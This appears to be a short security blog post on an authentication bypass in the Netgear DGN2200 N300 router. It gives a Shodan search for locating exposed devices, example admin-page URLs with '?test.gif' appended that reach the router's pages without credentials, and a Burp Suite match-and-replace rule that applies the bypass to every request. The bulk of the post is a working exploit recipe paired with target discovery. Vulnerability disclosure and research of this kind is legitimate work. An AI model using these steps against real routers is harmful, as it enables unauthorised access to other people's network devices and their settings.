Authentication Bypass - Netgear DGN2200 N300 Wireless ADSL2+ Modem Router

Introduction

Authentication bypass vulnerability exist in Netgear DGN2200 N300 Wireless ADSL2+ Modem Router version v1.

Device Identification

Identify vulnerable devices from the results of following Shodan search query:

netgear dgn2200

Shodan Query

Authentication Bypass

View the web pages of the router with out any credentials by appending ?test.gif to every URL as given below.

http://deviceIP:port/RST_status.htm?test.gif

http://deviceIP:port/BAS_pppoa.htm?test.gif

http://deviceIP:port/WAN_wan.htm?test.gif

Authentication Bypass

Automation Using Burp Suite Proxy Match and Replace

In Burp Suite Proxy > Options tab, add a Match and Replace rule to replace " HTTP/1.1" with "?test.gif HTTP1.1"
Burp Suite Match and Replace

From now on, every request in browser will be automatically appended with ?test.gif.
Burp Suite History


Video



Comments

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Dump memory to file from U-Boot console using Memory Display (md) log

Firmadyne Installation & Emulation of Firmware